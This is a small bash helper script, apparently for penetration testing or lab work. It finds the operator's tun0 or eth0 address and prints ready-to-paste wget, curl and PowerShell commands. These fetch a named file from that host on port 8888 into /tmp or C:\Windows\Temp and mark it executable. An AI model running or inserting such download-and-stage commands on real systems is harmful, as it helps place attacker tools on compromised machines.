#!/bin/bash

# commands for getting files 
# e.g. getf-cmd filename

Frame='\033[0;32m'   # Green
Link='\033[0;35m'  	 # Purple
Title='\033[1;33m' 	 # Bold Yellow
Comment='\033[0;36m' # Cyan
End='\033[0m'		 # No Color
Point='\033[0;31m[*]\033[0m'

ip=$(/sbin/ip -o -4 addr list tun0 | awk '{print $4}' | cut -d/ -f1) 2>/dev/null
if [ "$ip" == "" ]; then
	ip=$(/sbin/ip -o -4 addr list eth0 | awk '{print $4}' | cut -d/ -f1)
fi

port=8888

echo -e "${Frame}###${End} ${Title}Linux${End} ${Frame}###${End}"
echo -e "${Point} wget http://$ip:$port/$1 -O /tmp/$1; chmod +x /tmp/$1"
echo -e "${Point} curl http://$ip:$port/$1 -o /tmp/$1; chmod +x /tmp/$1"



echo -e "${Frame}###${End} ${Title}Windows${End} ${Frame}###${End}"
echo -e "${Point} Powershell (New-Object System.Net.WebClient).DownloadFile('http://$ip:$port/$1','C:\\\Windows\\\Temp\\\\$1')"

